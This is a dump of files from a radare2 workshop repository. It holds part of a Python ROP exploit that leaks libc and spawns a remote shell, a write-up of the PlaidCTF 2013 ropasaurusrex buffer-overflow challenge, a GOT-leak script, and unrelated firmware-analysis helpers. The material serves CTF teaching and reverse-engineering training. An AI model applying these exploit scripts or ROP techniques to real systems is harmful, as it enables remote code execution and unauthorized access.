0x804832c 14 | writeplt = 0x804830c 15 | read_got = 0x0804961c 16 | vuln_func = 0x080483F4 17 | write_addr = 0x08049524 # where we're going to write 18 | pop3ret = 0x080484b6 19 | 20 | # vm glibc offsets 21 | read_local = 0xd9d00 22 | system_local = 0x3e2c0 23 | exit_local = 0x310b0 24 | 25 | # local glibc offsets 26 | read_local = 0xdb1b0 27 | system_local = 0x3e770 28 | binsh_local = 0x1602c4 29 | 30 | system_offset = read_local - system_local 31 | binsh_offset = read_local - binsh_local 32 | 33 | s = socket.create_connection(('127.0.0.1', 2323)) 34 | 35 | print('[+] Sending stage1 (leak)') 36 | s.send('A'*140 + rop( 37 | writeplt, 38 | pop3ret, 39 | 1, # stdout 40 | read_got, 41 | 4, # size of a pointer 42 | 43 | # return to the vulnerable function 44 | vuln_func 45 | )) 46 | 47 | 48 | # receive leaked address of read 49 | leaked_got = struct.unpack('I', s.recv(4))[0] 50 | print('[*] GOT at 0x%08x' % leaked_got) 51 | 52 | # calculate address of system using the leaked offset 53 | system = leaked_got - system_offset 54 | print("[*] system(2) at 0x%08x" % system) 55 | 56 | binsh = leaked_got - binsh_offset 57 | print("[*] /bin/sh at 0x%08x" % binsh) 58 | 59 | # second stage ROP payload 60 | print('[+] Sending stage2 (call)') 61 | s.send('A'*140 + rop( 62 | system, 63 | 0x41414141, 64 | binsh 65 | )) 66 | 67 | while(True): 68 | s.send(raw_input('$ ') + '\n') 69 | print(s.recv(1024)) 70 | -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/notes.md: -------------------------------------------------------------------------------- 1 | This is a detailled writeup of the [Ropsaraurus Rex]() challenge 2 | from PlaidCTF 2013, that was used during the [hack.lu](https://2014.hack.lu) 3 | workshop about [radare2]( http://rada.re ). 4 | 5 | I'd like to thank [Eindbazen]( http://eindbazen.net/2013/05/pctf-2013-ropasaurus-pwn-200/ ) 6 | and [crowell]() for their help. I'm not a pro at [ROP]( https://en.wikipedia.org/wiki/Return-oriented_programming), 7 | and wanted be sure that I could answer every questions during the workshop. 8 | Every errors are mine, not their. 9 | 10 | The goal is not to write as quick as possible a working exploit, 11 | nor to explain what ROP is, but rather to show how radare2 can 12 | be used to craft some cool things. 13 | 14 | As always, you should get the latest radare2 version from [git]( https://github.com/radare/radare2 ) 15 | 16 | ``` 17 | $ git clone https://github.com/radare/radare2 18 | $ ./sys/install.sh 19 | ``` 20 | 21 | # Preliminary analysis 22 | Open up the ropasaurusrex binary in r2 with the `-A` option, to tell it 23 | to analyse the binary. We can get the list every functions with `afl`. 24 | 25 | ``` 26 | $ r2 -A ./ropasaurusrex 27 | [0x08048340]> afl 28 | 0x08048340 34 1 entry0 29 | 0x0804831c 6 1 sym.imp.__libc_start_main 30 | 0x08048322 10 1 fcn.08048322 31 | 0x080482f8 10 1 fcn.080482f8 32 | 0x08048302 10 1 fcn.08048302 33 | 0x0804830c 6 1 sym.imp.write 34 | 0x08048312 10 1 fcn.08048312 35 | 0x0804832c 6 1 sym.imp.read 36 | 0x08048332 10 1 fcn.08048332 37 | 0x0804833c 38 1 fcn.0804833c 38 | 0x08048370 85 5 fcn.08048370 39 | 0x080483c5 46 4 fcn.080483c5 40 | 0x080483f4 41 2 fcn.080483f3 41 | 0x0804841d 44 1 main 42 | 0x08048450 5 2 fcn.08048449 43 | 0x08048455 101 3 fcn.08048455 44 | 0x080484ba 4 1 fcn.080484ba 45 | 0x080484c0 42 3 fcn.080484c0 46 | 0x080484ec 28 2 fcn.080484ea 47 | 0x08048508 21 1 section..rodata 48 | [0x08048340]> 49 | ``` 50 | 51 | Not that much, cool. Let's disassemble the main function: 52 | 53 | ``` 54 | [0x08048340]> pdf @ main 55 | │ ; DATA XREF from 0x08048357 (entry0) 56 | ╒ (fcn) main 44 57 | │ 0x0804841d 55 push ebp 58 | │ 0x0804841e 89e5 mov ebp, esp 59 | │ 0x08048420 83e4f0 and esp, 0xfffffff0 60 | │ 0x08048423 83ec10 sub esp, 0x10 61 | │ 0x08048426 e8c9ffffff call fcn.080483f3 62 | │ fcn.080483f3(unk) 63 | │ 0x0804842b c7442408040. mov dword [esp+0x8], 0x4 64 | │ 0x08048433 c7442404108. mov dword [esp+0x4], str.WIN_n ; str.WIN_n 65 | │ 0x0804843b c7042401000. mov dword [esp], 0x1 66 | │ 0x08048442 e8c5feffff call sym.imp.write 67 | │ sym.imp.write() 68 | │ 0x08048447 c9 leave 69 | ╘ 0x08048448 c3 ret 70 | [0x08048340]> 71 | ``` 72 | 73 | The main function is really short, let's translate it into C. 74 | 75 | ``` 76 | int main() { 77 | fcn.0x80483f4(); 78 | sym.imp.write(stdout, str.WIN_n, 4); // write is fd, string, len 79 | } 80 | ``` 81 | 82 | So, the main function will call `fcn.0x80483f4()`, then print "WIN" and exit. 83 | ``` 84 | [0x08048340]> pdf @ fcn.080483f3 85 | ; CALL XREF from 0x08048426 (unk) 86 | ╒ (fcn) fcn.080483f3 41 87 | │ 0x080483f4 55 push ebp 88 | │ 0x080483f5 89e5 mov ebp, esp 89 | │ 0x080483f7 81ec98000000 sub esp, 0x98 90 | │ 0x080483fd c7442408000. mov dword [esp+0x8], 0x100 91 | │ 0x08048405 8d8578ffffff lea eax, [ebp-0x88] 92 | │ 0x0804840b 89442404 mov [esp+0x4], eax 93 | │ 0x0804840f c7042400000. mov dword [esp], 0x0 94 | │ 0x08048416 e811ffffff call sym.imp.read 95 | │ sym.imp.read(unk) 96 | │ 0x0804841b c9 leave 97 | ╘ 0x0804841c c3 ret 98 | [0x08048340]> 99 | ``` 100 | 101 | Great, this function is also very simple. 102 | Let's reverse it too! 103 | 104 | ``` 105 | sub_0x80483f4() { 106 | char buf[0x88]; 107 | sym.imp.read(stdin, buffer, 0x100); 108 | } 109 | ``` 110 | 111 | It seems that 0x100 bytes are read, and put in an array of 0x88 elements. 112 | Smells like a classic buffer-overflow. 113 | 114 | # Mitigations 115 | Since Aleph One's article 116 | [Smashing The Stack For Fun And Profit]( http://phrack.org/issues/49/14.html#article ), 117 | operating system and compiler have implemented hardening measures to thwart 118 | exploitation, like [ASLR]( https://en.wikipedia.org/wiki/Address_space_layout_randomization ) 119 | thanks to [PIC]( https://en.wikipedia.org/wiki/Position-independent_code ), 120 | [NX/W^X/DEP]( https://en.wikipedia.org/wiki/NX_bit ), 121 | [RELRO]( https://isisblogs.poly.edu/2011/06/01/relro-relocation-read-only/ ), ... 122 | 123 | `rabin2`, a tool from the radare2 suite, is able to detect those mitigations: 124 | ``` 125 | $ rabin2 -I ./ropasaurusrex 126 | file ./ropasaurusrex 127 | type EXEC (Executable file) 128 | pic false 129 | canary false 130 | nx true 131 | crypto false 132 | has_va true 133 | root elf 134 | class ELF32 135 | lang c 136 | arch x86 137 | bits 32 138 | machine Intel 80386 139 | os linux 140 | subsys linux 141 | endian little 142 | strip true 143 | static false 144 | linenum false 145 | lsyms false 146 | relocs false 147 | rpath NONE 148 | ``` 149 | 150 | We can see that the binary has NX enabled, forcing us to use ROP (surprise!). 151 | But on the bright side, it's not compiled with PIC: it will always 152 | be mapped at the same adress. We can use this to leak some known 153 | function offset and thus, defeating system-wide ASLR! 154 | 155 | # Getting control of EIP 156 | We need to see how many bytes we need to throw at this binary 157 | to get control of EIP. 158 | 159 | We ported the [De Bruijn](https://en.wikipedia.org/wiki/De_Bruijn_sequence) 160 | pattern generator of [mona.py](http://redmine.corelan.be/projects/mona) to 161 | radare2 (and the ragg2 tool). 162 | 163 | Let's generate the pattern: 164 | 165 | ``` 166 | $ ragg2 -P 300 -r 167 | AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAZAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABZABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB 168 | ``` 169 | 170 | We can now run the binary within r2's debugger, and pass the afermentioned 171 | pattern: 172 | 173 | ``` 174 | $ r2 -d ./ropasaurusrex 175 | Process with PID 21534 started... 176 | PID = 21534 177 | r_debug_select: 21534 21534 178 | pid = 21534 tid = 21534 179 | [0xf77d80d0]> dc 180 | AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAZAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABZABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB% 181 | [+] signal 11 aka SIGSEGV received 182 | [0x41417641]> dr eip 183 | eip = 0x41417641 184 | [0x41417641]> woO 0x41417641 185 | 140 186 | [0x41417641]> 187 | 188 | ``` 189 | 190 | Ok, we overwrote EIP with the value "0x41417641", which corresponds 191 | to the offset 140; we have to write 140 bytes of padding before our 192 | actual ropchain. 193 | 194 | # Thinking the ROP chain 195 | Remember that we have call to *read* and *write* function from libc in our 196 | binary? This provides us a read/write primitive, great! 197 | 198 | We're going to write a 3-stage payload: 199 | 1. Leak libc address of read(1) (to get the offset of system(2)), and return to the vulnerable function 200 | 2. Read our command, and write it *somewhere* 201 | 3. Call system(3) on it 202 | 4. Actually send our command 203 | 204 | There is also a more elegant solution: instead of returning 205 | to the vulnerable function, we could simply stack pivot like this: 206 | 1. Leak libc address of read(1) 207 | 2. Read our command and write it *somewhere* 208 | 3. Stack-pivot 209 | 4. Actually send our command 210 | 211 | We could also go the *Windows way*: 212 | 1. Leak libc address of mprotect(2) 213 | 2. Read our shellcode 214 | 3. Call mprotect on the previously-written shellcode 215 | 4. Return to our shellcode 216 | 217 | I'll only detail the first method in this writeup, 218 | but you can find PoC for all of them at the end 219 | of this document. 220 | 221 | # Building the chain 222 | 223 | If you don't remember the offsets of read(1)/write(1) in PLT, here they are: 224 | 225 | ``` 226 | [0xf77db0d0]> afl~imp.read 227 | 0x0804832c 6 1 sym.imp.read 228 | [0xf77db0d0]> afl~imp.write 229 | 0x0804830c 6 1 sym.imp.write 230 | ``` 231 | 232 | Now, we must get read's adress in GOT: 233 | ``` 234 | [0x08048340]> pdi 1 @ sym.imp.read 235 | 0x0804832c ff251c960408 jmp dword [0x804961c] 236 | [0x08048340]> 237 | ``` 238 | 239 | To leak a libc address we'll want to read from the GOT entry of a known libc 240 | function. We can see that read is in the GOT at 0x804961c. 241 | Write is done as such. 242 | ``` 243 | ssize_t write(int fildes, const void *buf, size_t nbyte); 244 | ``` 245 | So something like this is what we want. 246 | ``` 247 | write(1 /*stdout*/, 0x804961c /*read@got*/, 4 /*size to read*/); 248 | ``` 249 | But then, how do we clean up the stack to go to our next function which is to 250 | write our command? We need to pop 3 items off of the stack, and set the return 251 | address to read. So first, let's find how to pop off the stack. 252 | r2 has some great rop gadget search tools, so we need to find gadgets that do 253 | the following. 254 | ``` 255 | pop ? 256 | pop ? 257 | pop ? 258 | ret 259 | ``` 260 | Where `?` can be any register, we don't really care. This cleans up the stack 261 | and gets us to the next return address. We can use the `/R` command for finding 262 | gadgets. 263 | ``` 264 | [0x08048440]> /R pop,pop,pop,ret 265 | ``` 266 | r2 gives us back a bunch of example gadgets. I see one here which looks nice. 267 | ``` 268 | 0x080484b6 5e pop esi 269 | 0x080484b7 5f pop edi 270 | 0x080484b8 5d pop ebp 271 | 0x080484b9 c3 ret 272 | ``` 273 | I'll refer to this as "pppr" for poppoppopret. 274 | So, stage 1 of our payload can look like this 275 | ``` 276 | STAGE 1 277 | --frame_1-- 278 | [write@plt] 279 | [pppr ] // return address 280 | [1 ] 281 | [read@got ] 282 | [4 ] 283 | --frame_2-- 284 | [?? ] 285 | ``` 286 | Next, we need to find a place to write our command string to system. 287 | We can use the read function to do that. Read looks like this 288 | ``` 289 | ssize_t read(int fd, void *buf, size_t count);``` 290 | ``` 291 | So let's do 292 | ``` 293 | read(0 /*stdin*/, target, length of command); 294 | ``` 295 | We now need a place to read the string to. ELF has different sections, with 296 | different permissions. Some are read only, write only, execute only, or any 297 | combination of the three! rabin2 lets us see the secitions and find the 298 | permissions and sizes of each, so we can tell where to write to. 299 | ![Imgur](http://i.imgur.com/YsU1Blx.png) 300 | Perfect! there are plenty of sections. Generally I like to write to the `.bss` 301 | section, but this is only size 8, which would limit our command. So let's pick 302 | the `.dynamic` section. It is size 208, and we can write to it. 303 | ``` 304 | idx=20 vaddr=0x08049530 paddr=0x00000530 sz=208 vsz=208 perm=-rw- name=.dynamic 305 | ``` 306 | We'll reuse the same pppr gadget, because write has the same number of args. 307 | So now our rop chain can be. 308 | I'll call 0x08049530 writeaddr, and len(cmd) the length of our command. 309 | So this now leaks the libc address of read. Then calls read from stdin to a 310 | memory address that we can write to. Then we need to return to our vulnerable 311 | function to then execute the system address that we calculate. 312 | ``` 313 | STAGE 1 314 | --frame_1-- 315 | [write@plt] 316 | [pppr ] // return address 317 | [1 ] 318 | [read@got ] 319 | [4 ] 320 | --frame_2-- 321 | [vuln_func] 322 | 323 | STAGE2 324 | --frame_1-- 325 | [read@plt ] 326 | [pppr ] 327 | [0 ] 328 | [writeaddr ] 329 | [len(cmd)+1 ] 330 | ``` 331 | In my libc, we can find the offsets of read and system. Because we leak the 332 | libc address of read, we can compute where system is by doing the following 333 | math. 334 | ``` 335 | offset = libc_read - libc_system 336 | sys_addr = leaked_read_addr - offset 337 | ``` 338 | 339 | Let's see what libc we're using 340 | ``` 341 | $ r2 -d ropasaurusrex 342 | Process with PID 16952 started... 343 | PID = 16952 344 | r_debug_select: 16952 16952 345 | [0xf76fd0d0]> dcu entry0 346 | Continue until 0x08048340 347 | [0x08048340]> dm~libc 348 | [0x08048340]> 349 | ``` 350 | 351 | ``` 352 | $ r2 /lib/i386-linux-gnu/libc.so.6 353 | [0x00019be0]> is~name=system 354 | vaddr=0x00057450 paddr=0x00040100 ord=1443 fwd=NONE sz=56 bind=UNKNOWN type=FUNC name=system 355 | [0x00019be0]> is~name=read 356 | vaddr=0x000f2800 paddr=0x000db4b0 ord=950 fwd=NONE sz=125 bind=UNKNOWN type=FUNC name=read 357 | [0x00019be0]> 358 | ``` 359 | 360 | Or, since we're only interested in physical adresses: 361 | 362 | ``` 363 | $ r2 /lib/i386-linux-gnu/libc.so.6 364 | [0x00019be0]> is~name=system[1] 365 | paddr=0x00040100 366 | [0x00019be0]> is~name=read[1] 367 | paddr=0x000db4b0 368 | [0x00019be0]> 369 | ` 370 | Now all that is left is to do the same stack smash, then call system. 371 | System looks like this 372 | ``` 373 | int system(const char *command); 374 | ``` 375 | So we just want 376 | ``` 377 | system(0x08049530 /*address of the string we wrote*/); 378 | ``` 379 | Then were done! 380 | Let's see what our complete payload looks like: 381 | ``` 382 | STAGE 1 383 | --frame_1-- 384 | [write@plt] 385 | [pppr ] // return address 386 | [1 ] 387 | [read@got ] 388 | [4 ] 389 | --frame_2-- 390 | [vuln_func] 391 | 392 | STAGE2 393 | --frame_1-- 394 | [read@plt ] 395 | [pppr ] 396 | [0 ] 397 | [writeaddr ] 398 | [len(cmd)+1 399 | --frame_2-- 400 | [system ] 401 | [exit ] 402 | [writeaddr] 403 | 404 | STAGE3 405 | our shell payload 406 | ``` 407 | 408 | # Constructing a more complex ropchain 409 | Let's try something else: 410 | ``` 411 | $ r2 -d ./ropasaurusrex 412 | Process with PID 32702 started... 413 | PID = 32702 414 | r_debug_select: 32702 32702 415 | pid = 32702 tid = 32702 416 | [0xf77aa0d0]> dc 417 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB 418 | [+] signal 11 aka SIGSEGV received 419 | [0x42424242]> dr 420 | eip = 0x42424242 421 | oeax = 0xffffffff 422 | eax = 0x00000091 423 | ebx = 0xf777a000 424 | ecx = 0xffd174b0 425 | edx = 0x00000100 426 | esp = 0xffd17540 427 | ebp = 0x41414141 428 | esi = 0x00000000 429 | edi = 0x00000000 430 | eflags = 0x00010207 431 | [0x42424242]> pxw 12 @ ecx -1 432 | 0xffd174af 0x414141f7 0x41414141 0x41414141 .AAAAAAAAAAA 433 | ``` 434 | It seems that ecx points to the beginning of our buffer. 435 | -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/original: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/ropasaurus/original -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/ropasaurus/patched -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/readgot.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | 4 | def rop(*args): 5 | return struct.pack('I'*len(args), *args) 6 | 7 | writeplt = 0x804830c 8 | read_got = 0x804961C 9 | 10 | for i in range(10): 11 | s = socket.create_connection(('192.168.1.46', 2323)) 12 | 13 | s.send('A'*140 + rop( 14 | writeplt, 15 | 0x41414141, 16 | 1, 17 | read_got, 18 | 4 19 | )) 20 | leaked_got = struct.unpack('I', s.recv(4))[0] 21 | print(hex(leaked_got)) 22 | s.close() 23 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/.gdb_history: -------------------------------------------------------------------------------- 1 | run -a arm -b 32 -d -D gdb -e io.va=true gdb://127.0.0.1:1234 2 | bt 3 | q 4 | run -a arm -b 32 -d -D gdb -e io.va=true gdb://127.0.0.1:1234 5 | bt 6 | q 7 | run -a arm -b 32 -d -D gdb -e io.va=true gdb://127.0.0.1:1234 8 | bt 9 | q 10 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/connect_r2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | r2 -a arm.gnu -b 32 -d -D gdb -e io.va=true gdb://127.0.0.1:1234 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/cortex_A8.idc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // define register name and description 4 | // then define access table mask 5 | // [0] - Secure privileged Read 6 | // [1] - Secure privileged Write 7 | // [2] - Nonsecure privileged Read 8 | // [3] - Nonsecure privileged Write 9 | // [4] - Secure User Read 10 | // [5] - Secure User Write 11 | // [6] - Nonsecure User Read 12 | // [7] - Nonsecure User Write 13 | 14 | struct { 15 | char* name; 16 | char* description; 17 | char access_mask; 18 | } CP_reg; 19 | 20 | #define CP15_MAIN_ID_REGISTER "" 21 | #define CP15_MAIN_ID_REGISTER_ACESS_MASK 0xFF 22 | #define CP15_CACHE_TYPE_REGISTER "" 23 | 24 | static char* cp15_reg_comment_parser(char* name, char* description, int access_mask) { 25 | auto i; 26 | auto mask_str; 27 | 28 | i = name + ": \n" + description + "\n" + mask_str; 29 | return i; 30 | } 31 | 32 | static System_Control_Coprocessor(void) { 33 | 34 | // Example: "MRC p15, 0, R0, c0, c0, 1" - Read Cache Type Register 35 | 36 | addr_begin = FirstSeg(); 37 | i = addr_bagin; 38 | while ( NextAddr(i) != BADADDR ) { 39 | if (((GetMnem(i) == "MRC") | (GetMnem(i) == "MCR")) & (GetOpnd(i, 0) == 0)) { 40 | Operand_1 = GetOpnd(i, 1); 41 | 42 | // Extracting "R0" register 43 | instr_register = substr(Operand_1, 0, 1); 44 | // Extracting first "c0" 45 | instr_coprocessor_register1 = substr(Operand_1, 3, 4); 46 | // Extracting second "c0" 47 | instr_coprocessor_register2 = substr(Operand_1, 6, 7); 48 | // Exracting operand parameter 49 | instr_operand_param = GetOpnd(i, 2); 50 | switch (instr_coprocessor_register1) { 51 | case "c0": 52 | switch (instr_coprocessor_register2) { 53 | case "c0": 54 | if (intr_operand_param == 0) { 55 | // this is an Read Main ID Register 56 | MakeComm(i, CP_MAIN_ID_REGISTER); 57 | } 58 | else { 59 | // this is a Cache Type Register 60 | MakeComm(i, CP_CACHE_TYPE_REGISTER); 61 | } 62 | case "c1": 63 | case "c2": 64 | } 65 | case "c1": 66 | switch (instr_coprocessor_register2) { 67 | case "c0": 68 | case "c1": 69 | case "c2": 70 | } 71 | case "c2": 72 | case "c3": 73 | // Domain Access Control 74 | case "c5": 75 | 76 | case "c6": 77 | case "c7": 78 | case "c8": 79 | case "c9": 80 | case "c10": 81 | case "c11": 82 | case "c12": 83 | case "c13": 84 | case "c14": 85 | case "c15": 86 | default: 87 | Message("Wrong Coprocessor Register!\n"); 88 | } 89 | } 90 | i++; 91 | } 92 | } 93 | 94 | static main(void) { 95 | System_Control_Coprocessor(); 96 | 97 | } 98 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/idc2r.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # radare - LGPL - Copyright 2013 - xvilka 4 | 5 | import re 6 | import sys 7 | 8 | class Func(object): 9 | # FIXME: parse ftype into params and values 10 | def __init__(self, name="unknown", params=[], values=[], address=0, size=0, ftype=""): 11 | self.name = name 12 | self.params = params 13 | self.values = values 14 | self.address = address 15 | self.size = size 16 | self.ftype = ftype 17 | 18 | class Llabel(object): 19 | def __init__(self, name="unknown", address=0): 20 | self.name = name 21 | self.address = address 22 | 23 | class Comm(object): 24 | def __init__(self, text="", address=0): 25 | self.text = text 26 | self.address = address 27 | 28 | class Enum(object): 29 | def __init__(self, name="unknown", members=[]): 30 | self.name = name 31 | self.members = members 32 | 33 | class Struct(object): 34 | def __init__(self, name="unknown", members=[]): 35 | self.name = name 36 | self.members = members 37 | 38 | class Union(object): 39 | def __init__(self, name="unknown", members=[]): 40 | self.name = name 41 | self.members = members 42 | 43 | class Type(object): 44 | def __init__(self, name="unknown"): 45 | self.name = name 46 | self.members = members 47 | 48 | # ----------------------------------------------------------------------- 49 | 50 | functions = [] 51 | llabels = [] 52 | comments = [] 53 | structs = [] 54 | enums = [] 55 | types = [] 56 | 57 | def functions_parse(idc): 58 | 59 | # MakeFunction (0XF3C99,0XF3CA8); 60 | mkfun_re = re.compile(""" 61 | (?m) # Multiline 62 | ^[ \t]*MakeFunction[ \t]*\( 63 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 64 | [ \t]*\,[ \t]* 65 | (?P0[xX][\dA-Fa-f]{1,8}) # Function end 66 | [ \t]*\);[ \t]*$ 67 | """, re.VERBOSE) 68 | mkfun_group_name = dict([(v,k) for k,v in mkfun_re.groupindex.items()]) 69 | mkfun = mkfun_re.finditer(idc) 70 | for match in mkfun : 71 | fun = Func() 72 | for group_index,group in enumerate(match.groups()) : 73 | if group : 74 | if mkfun_group_name[group_index+1] == "fstart" : 75 | fun.address = int(group, 16) 76 | if mkfun_group_name[group_index+1] == "fend" : 77 | fun.size = int(group, 16) - fun.address 78 | 79 | functions.append(fun) 80 | 81 | # SetFunctionFlags (0XF3C99, 0x400); 82 | mkfunflags_re = re.compile(""" 83 | (?m) # Multiline 84 | ^[ \t]*SetFunctionFlags[ \t*]\( 85 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 86 | [ \t]*\,[ \t]* 87 | (?P0[xX][\dA-Fa-f]{1,8}) # Flags 88 | [ \t]*\);[ \t]*$ 89 | """, re.VERBOSE) 90 | mkfunflags_group_name = dict([(v,k) for k,v in mkfunflags_re.groupindex.items()]) 91 | mkfunflags = mkfunflags_re.finditer(idc) 92 | for match in mkfunflags : 93 | for group_index,group in enumerate(match.groups()) : 94 | if group : 95 | if mkfunflags_group_name[group_index+1] == "fstart" : 96 | addr = int(group, 16) 97 | if mkfunflags_group_name[group_index+1] == "flags" : 98 | for fun in functions : 99 | if fun.address == addr : 100 | pass # TODO: parse flags 101 | 102 | 103 | # MakeFrame (0XF3C99, 0, 0, 0); 104 | # MakeName (0XF3C99, "SIO_port_setup_S"); 105 | mkname_re = re.compile(""" 106 | (?m) # Multiline 107 | ^[ \t]*MakeName[ \t]*\( 108 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 109 | [ \t]*\,[ \t]* 110 | "(?P.*)" # Function name 111 | [ \t]*\);[ \t]*$ 112 | """, re.VERBOSE) 113 | mkname_group_name = dict([(v,k) for k,v in mkname_re.groupindex.items()]) 114 | mkname = mkname_re.finditer(idc) 115 | for match in mkname : 116 | for group_index,group in enumerate(match.groups()) : 117 | if group : 118 | if mkname_group_name[group_index+1] == "fstart" : 119 | addr = int(group, 16) 120 | if mkname_group_name[group_index+1] == "fname" : 121 | for fun in functions : 122 | if fun.address == addr : 123 | fun.name = group 124 | 125 | # SetType (0XFFF72, "__int32 __cdecl PCI_ByteWrite_SL(__int32 address, __int32 value)"); 126 | mkftype_re = re.compile(""" 127 | (?m) # Multiline 128 | ^[ \t]*SetType[ \t]*\( 129 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 130 | [ \t]*\,[ \t]* 131 | "(?P.*)" # Function type 132 | [ \t]*\);[ \t]*$ 133 | """, re.VERBOSE) 134 | mkftype_group_name = dict([(v,k) for k,v in mkftype_re.groupindex.items()]) 135 | mkftype = mkftype_re.finditer(idc) 136 | for match in mkftype : 137 | for group_index,group in enumerate(match.groups()) : 138 | if group : 139 | if mkftype_group_name[group_index+1] == "fstart" : 140 | addr = int(group, 16) 141 | if mkftype_group_name[group_index+1] == "ftype" : 142 | for fun in functions : 143 | if fun.address == addr : 144 | fun.ftype = group 145 | 146 | # MakeNameEx (0xF3CA0, "return", SN_LOCAL); 147 | mklocal_re = re.compile(""" 148 | (?m) # Multiline 149 | ^[ \t]*MakeNameEx[ \t]*\( 150 | (?P0[xX][\dA-Fa-f]{1,8}) # Local label address 151 | [ \t]*\,[ \t]* 152 | "(?P.*)" # Local label name 153 | [ \t]*\,[ \t]*SN_LOCAL 154 | [ \t]*\);[ \t]*$ 155 | """, re.VERBOSE) 156 | mklocal_group_name = dict([(v,k) for k,v in mklocal_re.groupindex.items()]) 157 | mklocal = mklocal_re.finditer(idc) 158 | for match in mklocal : 159 | lab = Llabel() 160 | for group_index,group in enumerate(match.groups()) : 161 | if group : 162 | if mklocal_group_name[group_index+1] == "laddr" : 163 | lab.address = int(group, 16) 164 | if mklocal_group_name[group_index+1] == "lname" : 165 | lab.name = group 166 | llabels.append(lab) 167 | 168 | # ---------------------------------------------------------------------- 169 | 170 | def enums_parse(idc): 171 | pass 172 | 173 | # ---------------------------------------------------------------------- 174 | 175 | def structs_parse(idc): 176 | # id = AddStrucEx (-1, "struct_MTRR", 0); 177 | mkstruct_re = re.compile(""" 178 | (?m) # Multiline 179 | ^[ \t]*id[ \t]*=[ \t]*AddStrucEx[ \t]*\( 180 | [ \t]*-1[ \t]*,[ \t]* 181 | "(?P.*)" # Structure name 182 | [ \t]*\,[ \t]*0 183 | [ \t]*\);[ \t]*$ 184 | """, re.VERBOSE) 185 | mkstruct_group_name = dict([(v,k) for k,v in mkstruct_re.groupindex.items()]) 186 | mkstruct = mkstruct_re.finditer(idc) 187 | for match in mkstruct : 188 | s = Struct() 189 | for group_index,group in enumerate(match.groups()) : 190 | if group : 191 | if mkstruct_group_name[group_index+1] == "sname" : 192 | s.name = group 193 | structs.append(s) 194 | 195 | # Case 1: not nested structures 196 | # ============================= 197 | # id = GetStrucIdByName ("struct_header"); 198 | # mid = AddStructMember(id,"BCPNV", 0, 0x5000c500, 0, 7); 199 | # mid = AddStructMember(id,"_", 0X7, 0x00500, -1, 1); 200 | # mid = AddStructMember(id, "BCPNV_size",0X8, 0x004500, -1, 1); 201 | mkstruct_re = re.compile(""" 202 | (?m) # Multiline 203 | ^[ \t]*id[ \t]*=[ \t]*GetStrucIdByName[ \t]*\( 204 | [ \t]*-1[ \t]*,[ \t]* 205 | "(?P.*)" # Structure name 206 | [ \t]*\,[ \t]*0 207 | [ \t]*\);[ \t]*$ 208 | """, re.VERBOSE) 209 | 210 | # ---------------------------------------------------------------------- 211 | 212 | def comments_parse(idc): 213 | # MakeComm (0XFED3D, "PCI class 0x600 - Host/PCI bridge"); 214 | mkcomm_re = re.compile(""" 215 | (?m) # Multiline 216 | ^[ \t]*MakeComm[ \t]*\( 217 | (?P0[xX][\dA-Fa-f]{1,8}) # Comment address 218 | [ \t]*\,[ \t]* 219 | "(?P.*)" # Comment 220 | [ \t]*\);[ \t]*$ 221 | """, re.VERBOSE) 222 | mkcomm_group_name = dict([(v,k) for k,v in mkcomm_re.groupindex.items()]) 223 | mkcomm = mkcomm_re.finditer(idc) 224 | for match in mkcomm : 225 | for group_index,group in enumerate(match.groups()) : 226 | if group : 227 | if mkcomm_group_name[group_index+1] == "caddr" : 228 | address = int(group, 16) 229 | if mkcomm_group_name[group_index+1] == "ctext" : 230 | com_multi = group.split('\\n') 231 | for a in com_multi : 232 | com = Comm() 233 | com.address = address 234 | com.text = a 235 | comments.append(com) 236 | 237 | # ---------------------------------------------------------------------- 238 | 239 | # print("af+ 0x%08lx %d %s" % (func.address, func.size, func.name)) 240 | 241 | def generate_r2(): 242 | for f in functions : 243 | if f.name != "unknown" : 244 | print("af+ {0} {1} {2}".format(hex(f.address), f.size, f.name)) 245 | print("\"CCa {0} {1}\"".format(hex(f.address), f.ftype)) 246 | 247 | for l in llabels : 248 | if l.name != "unknown" : 249 | for f in functions : 250 | if (l.address > f.address) and (l.address < (f.address + f.size)) : 251 | print("f. {0} @ {1}".format(l.name, hex(l.address))) 252 